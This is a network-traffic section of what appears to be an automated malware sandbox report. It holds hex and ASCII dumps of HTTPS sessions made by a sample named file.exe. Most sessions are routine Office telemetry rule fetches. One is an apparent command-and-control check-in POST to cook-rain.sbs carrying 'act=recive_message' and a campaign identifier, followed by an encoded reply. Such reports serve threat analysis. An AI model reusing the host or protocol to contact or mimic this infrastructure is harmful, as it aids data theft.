                                                                                                                                                                                                                      Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                                                                      2024-11-20 16:41:23 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                                                                                      Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                                                                      2024-11-20 16:41:24 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                                                                      Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                                                                                                      2024-11-20 16:41:24 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                                                                      2024-11-20 16:41:24 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      2192.168.2.749706104.21.66.384437476C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:24 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Content-Length: 53
                                                                                                                                                                                                                      Host: cook-rain.sbs
                                                                                                                                                                                                                      2024-11-20 16:41:24 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                                                                      2024-11-20 16:41:24 UTC983INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:24 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=3u32hvsurdcf0vsvpkt3csvo1g; expires=Sun, 16-Mar-2025 10:28:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pPcITdzSsXkXzc8TWmTFy4GUI82UN9PVcGf9X9dmn%2BtOF%2Fv0%2BwPRd69XJKazYHuMxx83of%2BJks1awWInaiqFZKnRfdDhYI1qvuQBjG9mGCO0e%2FtZsqNEzMpAQy23GJ4U"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8e59e3277fd58ca5-EWR
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2007&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4198&recv_bytes=950&delivery_rate=161388&cwnd=242&unsent_bytes=0&cid=16d6eb855c127b1a&ts=779&x=0"
                                                                                                                                                                                                                      2024-11-20 16:41:24 UTC386INData Raw: 34 34 36 63 0d 0a 6a 71 65 37 70 32 6e 52 74 64 44 37 71 73 56 6f 75 48 42 54 4e 41 38 4f 35 6a 2b 37 58 51 42 2b 6e 37 49 32 33 54 42 71 39 76 54 31 68 63 32 46 55 2b 57 5a 38 6f 6a 50 35 31 4c 4d 41 69 5a 52 49 79 79 48 57 35 6c 6e 5a 68 2f 7a 77 56 50 78 45 68 79 62 31 72 54 42 32 73 73 61 74 4a 6e 79 6e 74 4c 6e 55 75 4d 4c 63 56 46 68 4c 4e 77 64 33 6a 64 69 48 2f 50 51 56 37 5a 66 47 70 71 58 35 73 76 63 7a 77 79 79 30 62 47 58 78 36 41 4e 33 52 45 35 57 6d 5a 6a 6a 6c 4b 5a 63 53 49 62 35 5a 41 4d 2f 33 30 50 67 70 58 44 78 73 6a 4d 53 36 79 5a 71 39 6e 50 71 30 71 43 55 6a 4a 52 62 57 4b 41 57 39 41 31 61 42 62 37 30 56 4b 33 51 41 4f 51 6e 4f 62 46 33 38 34 47 75 38 57 38 6e 63 43 72 43 39 63 52 63 52 67 74 61 35 77 64 67 58 38 78 4c 76 37 42 52
                                                                                                                                                                                                                      Data Ascii: 446cjqe7p2nRtdD7qsVouHBTNA8O5j+7XQB+n7I23TBq9vT1hc2FU+WZ8ojP51LMAiZRIyyHW5lnZh/zwVPxEhyb1rTB2ssatJnyntLnUuMLcVFhLNwd3jdiH/PQV7ZfGpqX5svczwyy0bGXx6AN3RE5WmZjjlKZcSIb5ZAM/30PgpXDxsjMS6yZq9nPq0qCUjJRbWKAW9A1aBb70VK3QAOQnObF384Gu8W8ncCrC9cRcRgta5wdgX8xLv7BR
                                                                                                                                                                                                                      2024-11-20 16:41:24 UTC1369INData Raw: 42 5a 6d 51 37 4d 57 5a 69 30 75 30 7a 2f 4c 42 69 49 51 50 79 68 55 39 51 43 39 57 78 45 4b 58 4a 69 49 62 38 5a 41 4d 2f 31 6f 4e 6c 35 58 6e 79 74 72 4e 41 4b 48 58 6f 4a 2f 46 6f 68 6a 63 46 7a 39 63 62 6e 36 4f 55 39 38 38 61 78 66 30 31 56 4f 37 45 6b 62 55 6b 66 53 46 67 59 55 71 76 74 79 2b 6b 39 2b 6e 53 73 56 63 4b 42 5a 71 59 4d 51 46 6d 54 74 6a 47 50 7a 55 57 72 46 57 42 4a 4b 59 34 63 72 66 7a 77 75 30 33 62 71 52 79 61 6f 42 31 52 49 30 57 32 6c 71 69 46 7a 63 66 79 78 63 2b 73 67 55 35 78 49 6d 6b 35 58 2b 68 2b 7a 47 42 62 33 51 70 4e 6e 58 36 52 4f 61 46 54 30 57 4e 53 79 4b 57 4e 59 74 59 77 37 34 33 6b 61 7a 56 77 36 5a 6c 65 4c 46 33 4d 49 47 76 64 47 31 6d 73 43 6a 43 39 51 65 4f 31 56 70 62 38 51 54 6d 54 68 36 58 4b 57 51 5a 62 78
                                                                                                                                                                                                                      Data Ascii: BZmQ7MWZi0u0z/LBiIQPyhU9QC9WxEKXJiIb8ZAM/1oNl5XnytrNAKHXoJ/FohjcFz9cbn6OU988axf01VO7EkbUkfSFgYUqvty+k9+nSsVcKBZqYMQFmTtjGPzUWrFWBJKY4crfzwu03bqRyaoB1RI0W2lqiFzcfyxc+sgU5xImk5X+h+zGBb3QpNnX6ROaFT0WNSyKWNYtYw743kazVw6ZleLF3MIGvdG1msCjC9QeO1Vpb8QTmTh6XKWQZbx
                                                                                                                                                                                                                      2024-11-20 16:41:24 UTC1369INData Raw: 2b 76 50 31 38 49 50 76 39 36 2f 6e 38 69 67 44 74 38 41 4e 46 39 68 59 4d 51 54 6d 54 68 36 58 4b 57 51 65 37 68 45 43 37 75 56 2f 63 79 5a 32 6b 57 71 6c 37 57 56 69 50 39 4b 33 52 63 35 58 57 74 6b 68 45 2f 63 4d 57 6b 64 39 39 5a 56 73 6c 34 4f 6c 4a 66 73 77 39 58 46 44 4c 54 46 6f 4a 7a 4f 74 51 43 61 58 48 46 52 64 53 7a 63 48 65 38 76 64 51 33 72 6b 6d 47 38 58 41 61 54 67 4b 7a 61 6c 39 78 4c 74 4e 76 79 77 59 69 73 43 74 59 56 4f 56 42 70 5a 49 74 53 30 43 31 6a 45 50 50 43 55 37 39 62 42 70 75 61 35 63 6a 65 79 41 43 35 32 72 61 65 79 65 64 45 6d 68 55 70 46 6a 55 73 73 6b 33 55 4d 30 77 58 38 64 6b 55 6f 42 77 52 31 4a 48 67 68 59 47 46 44 37 2f 66 75 4a 62 42 72 51 44 56 47 7a 46 65 5a 47 57 48 58 64 55 35 59 78 44 78 33 56 47 38 56 77 57 52
                                                                                                                                                                                                                      Data Ascii: +vP18IPv96/n8igDt8ANF9hYMQTmTh6XKWQe7hEC7uV/cyZ2kWql7WViP9K3Rc5XWtkhE/cMWkd99ZVsl4OlJfsw9XFDLTFoJzOtQCaXHFRdSzcHe8vdQ3rkmG8XAaTgKzal9xLtNvywYisCtYVOVBpZItS0C1jEPPCU79bBpua5cjeyAC52raeyedEmhUpFjUssk3UM0wX8dkUoBwR1JHghYGFD7/fuJbBrQDVGzFeZGWHXdU5YxDx3VG8VwWR
                                                                                                                                                                                                                      2024-11-20 16:41:24 UTC1369INData Raw: 43 46 44 4c 2b 58 36 74 6e 45 70 41 62 53 48 54 64 66 59 57 61 4e 56 74 55 30 5a 68 44 30 31 56 4b 2b 56 77 32 56 6b 75 44 50 33 38 59 49 76 4e 69 39 6b 59 6a 70 53 74 30 4b 63 51 34 74 53 5a 4e 57 31 7a 6b 69 41 37 50 4a 46 4c 68 65 53 4d 7a 57 34 4d 7a 66 77 77 36 2f 31 72 53 52 7a 61 38 4f 32 78 51 33 56 57 4a 6f 67 56 7a 57 4f 32 34 53 39 39 46 56 73 31 6b 48 6e 35 4f 73 69 35 6e 43 45 2f 4f 50 38 71 6a 4c 73 52 33 4b 48 6e 46 4a 49 33 58 45 57 74 56 2f 4f 6c 7a 38 77 6c 36 31 58 41 32 62 6b 2b 2f 4b 33 73 67 4e 76 39 32 37 6b 63 36 6f 41 38 67 52 50 56 68 71 59 6f 68 54 31 44 56 68 45 62 32 65 46 4c 68 4b 53 4d 7a 57 77 4d 4c 55 36 77 43 2f 30 50 4b 47 68 72 35 4b 33 52 35 78 44 69 31 67 6a 6c 48 51 50 32 73 5a 39 64 74 64 75 6c 4d 44 6b 5a 58 71 79
                                                                                                                                                                                                                      Data Ascii: CFDL+X6tnEpAbSHTdfYWaNVtU0ZhD01VK+Vw2VkuDP38YIvNi9kYjpSt0KcQ4tSZNW1zkiA7PJFLheSMzW4Mzfww6/1rSRza8O2xQ3VWJogVzWO24S99FVs1kHn5Osi5nCE/OP8qjLsR3KHnFJI3XEWtV/Olz8wl61XA2bk+/K3sgNv927kc6oA8gRPVhqYohT1DVhEb2eFLhKSMzWwMLU6wC/0PKGhr5K3R5xDi1gjlHQP2sZ9dtdulMDkZXqy
                                                                                                                                                                                                                      2024-11-20 16:41:24 UTC1369INData Raw: 30 32 2f 4c 42 69 4b 45 46 30 78 45 2b 56 32 52 67 69 56 6a 51 4f 6d 4d 61 2b 64 70 65 76 31 51 4f 6c 5a 50 6d 78 74 6a 50 41 72 54 66 74 5a 72 61 35 30 53 61 46 53 6b 57 4e 53 79 74 57 73 73 78 63 6c 7a 69 6e 6b 33 2f 56 51 54 55 7a 71 7a 42 30 38 6f 50 74 4e 75 30 6e 4d 36 71 43 39 55 54 4d 56 6c 70 5a 34 31 62 32 44 4a 6e 45 66 6e 43 58 72 52 64 42 4a 32 61 34 59 57 58 68 51 79 72 6c 2b 72 5a 2b 61 6f 45 31 42 55 6e 46 6e 49 69 6e 52 33 65 4d 79 4a 45 76 64 46 59 73 46 45 48 6c 35 58 74 7a 38 76 58 42 37 72 66 74 35 58 44 71 51 7a 49 46 44 35 66 62 6d 2b 4e 57 74 45 7a 61 42 2f 36 6b 42 72 2f 56 52 44 55 7a 71 7a 6d 7a 74 55 47 38 38 6a 38 67 49 69 67 42 70 70 4b 63 56 35 67 5a 49 35 5a 33 6a 4a 6c 47 76 54 43 58 62 70 63 43 4a 43 64 34 38 50 64 78 67
                                                                                                                                                                                                                      Data Ascii: 02/LBiKEF0xE+V2RgiVjQOmMa+dpev1QOlZPmxtjPArTftZra50SaFSkWNSytWssxclzink3/VQTUzqzB08oPtNu0nM6qC9UTMVlpZ41b2DJnEfnCXrRdBJ2a4YWXhQyrl+rZ+aoE1BUnFnIinR3eMyJEvdFYsFEHl5Xtz8vXB7rft5XDqQzIFD5fbm+NWtEzaB/6kBr/VRDUzqzmztUG88j8gIigBppKcV5gZI5Z3jJlGvTCXbpcCJCd48Pdxg
                                                                                                                                                                                                                      2024-11-20 16:41:24 UTC1369INData Raw: 6b 4d 66 6e 52 4a 6f 56 4b 52 59 31 4c 4b 56 47 32 6a 4e 76 58 4f 4b 65 54 66 39 56 42 4e 54 4f 72 4d 6e 58 77 41 75 35 30 62 61 63 7a 71 30 50 32 68 6b 79 57 57 6c 71 67 46 4c 5a 4e 47 73 64 2b 39 56 65 74 46 51 46 6c 35 44 71 68 5a 65 46 44 4b 75 58 36 74 6e 6f 76 41 66 57 46 58 46 4a 49 33 58 45 57 74 56 2f 4f 6c 7a 32 33 46 43 34 55 67 57 58 6e 75 6e 42 30 38 41 4c 75 38 57 36 6d 63 2b 31 47 4e 6f 62 4e 46 70 75 62 49 42 62 30 44 6c 68 47 4c 32 65 46 4c 68 4b 53 4d 7a 57 77 63 6e 65 37 41 79 6f 6c 36 33 58 30 65 63 4e 31 6c 4a 70 46 6d 78 6e 6a 6c 4c 55 50 47 51 66 39 74 56 65 76 6c 55 41 6d 59 54 76 79 74 62 42 43 37 7a 52 74 4a 6a 48 6f 51 33 54 45 7a 6c 52 4c 53 4c 45 57 73 46 2f 4f 6c 7a 54 31 31 65 37 45 68 66 61 6a 36 7a 43 31 59 56 54 38 39 65
                                                                                                                                                                                                                      Data Ascii: kMfnRJoVKRY1LKVG2jNvXOKeTf9VBNTOrMnXwAu50baczq0P2hkyWWlqgFLZNGsd+9VetFQFl5DqhZeFDKuX6tnovAfWFXFJI3XEWtV/Olz23FC4UgWXnunB08ALu8W6mc+1GNobNFpubIBb0DlhGL2eFLhKSMzWwcne7Ayol63X0ecN1lJpFmxnjlLUPGQf9tVevlUAmYTvytbBC7zRtJjHoQ3TEzlRLSLEWsF/OlzT11e7Ehfaj6zC1YVT89e
                                                                                                                                                                                                                      2024-11-20 16:41:24 UTC1369INData Raw: 77 32 61 4c 58 38 57 64 53 7a 63 48 65 77 38 62 42 4c 36 78 6b 58 79 64 52 36 65 6b 66 7a 43 7a 73 70 4c 2f 5a 65 30 32 5a 44 30 52 4a 6f 57 49 42 59 31 50 4e 59 47 6a 47 77 31 54 4b 2f 50 47 71 59 53 48 74 54 4f 76 6f 75 5a 31 30 76 72 6c 2f 57 61 32 72 55 4d 32 51 51 79 45 56 4e 53 6f 30 66 55 4f 58 55 4e 77 2b 35 54 70 56 38 4f 67 34 65 67 30 4e 72 4c 42 62 54 42 38 74 65 49 71 45 71 43 4b 33 45 65 4c 56 50 4b 48 63 46 2f 4f 6c 7a 49 30 31 71 78 56 52 36 46 32 38 76 66 31 4d 4d 63 6f 70 66 38 32 63 37 6e 55 6f 70 63 63 56 4a 38 4c 4e 77 4e 69 32 51 33 54 36 71 41 42 71 41 63 45 64 53 41 72 4a 32 4c 69 30 75 68 6c 2b 72 5a 6a 36 51 59 79 42 51 79 51 47 34 72 75 6d 50 33 4f 47 51 5a 2b 73 41 57 6b 56 6b 63 6b 39 61 69 68 64 61 46 55 34 71 58 2b 74 6e 33
                                                                                                                                                                                                                      Data Ascii: w2aLX8WdSzcHew8bBL6xkXydR6ekfzCzspL/Ze02ZD0RJoWIBY1PNYGjGw1TK/PGqYSHtTOvouZ10vrl/Wa2rUM2QQyEVNSo0fUOXUNw+5TpV8Og4eg0NrLBbTB8teIqEqCK3EeLVPKHcF/OlzI01qxVR6F28vf1MMcopf82c7nUopccVJ8LNwNi2Q3T6qABqAcEdSArJ2Li0uhl+rZj6QYyBQyQG4rumP3OGQZ+sAWkVkck9aihdaFU4qX+tn3
                                                                                                                                                                                                                      2024-11-20 16:41:24 UTC1369INData Raw: 42 2f 46 6d 6c 39 78 41 57 4a 62 54 6c 4a 72 6f 63 45 37 55 31 47 6a 64 62 36 68 59 47 58 52 66 50 46 38 73 47 49 34 41 6e 49 41 44 64 56 65 32 2f 44 59 2b 63 59 62 42 76 38 78 6b 53 6f 58 55 65 36 6f 4d 33 37 35 39 41 49 76 64 6d 31 6a 39 6e 6e 52 4a 6f 64 63 51 35 55 4c 4d 77 64 35 6e 45 69 42 4c 32 49 46 49 70 52 42 70 71 52 2b 74 53 55 34 67 57 30 31 71 53 4a 33 36 68 46 39 43 51 51 46 69 4d 73 67 68 32 42 62 53 78 63 2b 63 45 55 35 77 4a 61 7a 38 4f 2f 6b 6f 6d 58 46 50 33 4f 38 6f 2b 49 2f 31 69 55 55 69 4d 57 4e 53 7a 44 58 73 73 74 5a 42 2f 72 30 78 4f 42 62 43 2b 61 6b 65 33 54 79 63 67 48 6b 74 53 6a 6b 2f 61 5a 48 39 6b 63 50 31 46 37 66 63 51 54 6d 54 41 69 52 4d 53 51 48 50 39 74 52 74 53 4f 72 4a 32 5a 38 41 69 39 32 62 57 50 32 65 6f 74 31
                                                                                                                                                                                                                      Data Ascii: B/Fml9xAWJbTlJrocE7U1Gjdb6hYGXRfPF8sGI4AnIADdVe2/DY+cYbBv8xkSoXUe6oM3759AIvdm1j9nnRJodcQ5ULMwd5nEiBL2IFIpRBpqR+tSU4gW01qSJ36hF9CQQFiMsgh2BbSxc+cEU5wJaz8O/komXFP3O8o+I/1iUUiMWNSzDXsstZB/r0xOBbC+ake3TycgHktSjk/aZH9kcP1F7fcQTmTAiRMSQHP9tRtSOrJ2Z8Ai92bWP2eot1
                                                                                                                                                                                                                      2024-11-20 16:41:24 UTC1369INData Raw: 76 53 6f 64 4c 32 6e 38 73 58 4f 57 51 44 50 39 2f 47 70 4f 47 37 34 66 31 77 67 61 2f 6c 36 33 58 30 65 63 63 6d 6b 70 69 47 43 31 2b 78 41 57 5a 65 47 45 4f 37 39 5a 58 71 56 46 50 71 71 6a 42 31 39 37 56 43 50 48 6d 76 35 33 65 73 67 6e 4b 46 51 39 6f 51 48 36 44 54 64 70 39 52 79 61 2f 34 55 4b 38 55 67 61 54 31 71 4b 46 77 59 56 54 38 2f 71 67 6e 74 69 6b 53 50 38 6f 63 32 64 37 62 34 52 54 33 6e 39 39 55 75 53 51 51 76 38 4b 57 39 72 57 2f 6f 57 42 68 55 79 39 32 72 4f 61 78 71 51 59 79 42 51 79 51 47 34 72 75 6d 50 32 4e 47 4d 4d 38 4d 46 5a 75 30 51 32 71 72 48 71 77 4e 37 37 4e 59 54 47 74 59 6d 4b 67 51 6e 4d 45 58 45 59 4c 58 54 45 42 5a 6b 59 5a 42 6e 36 6b 42 72 2f 56 6b 6a 4d 31 73 50 4f 32 4e 55 47 6f 74 71 32 6a 34 71 41 44 4e 38 56 63 52
                                                                                                                                                                                                                      Data Ascii: vSodL2n8sXOWQDP9/GpOG74f1wga/l63X0eccmkpiGC1+xAWZeGEO79ZXqVFPqqjB197VCPHmv53esgnKFQ9oQH6DTdp9Rya/4UK8UgaT1qKFwYVT8/qgntikSP8oc2d7b4RT3n99UuSQQv8KW9rW/oWBhUy92rOaxqQYyBQyQG4rumP2NGMM8MFZu0Q2qrHqwN77NYTGtYmKgQnMEXEYLXTEBZkYZBn6kBr/VkjM1sPO2NUGotq2j4qADN8VcR


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      3192.168.2.74971113.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:25 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:26 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:26 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 2160
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                                      x-ms-request-id: 8753231e-501e-008f-038c-3a9054000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164126Z-185f5d8b95cdcwrthC1NYCy5b80000000ad000000000uf5a
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:26 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      4192.168.2.74971013.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:25 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:26 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:26 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 2980
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                      x-ms-request-id: 884d2a23-a01e-00ab-5b8c-3a9106000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164126Z-1777c6cb754vxwc9hC1TEBykgw00000009w000000000a9s2
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
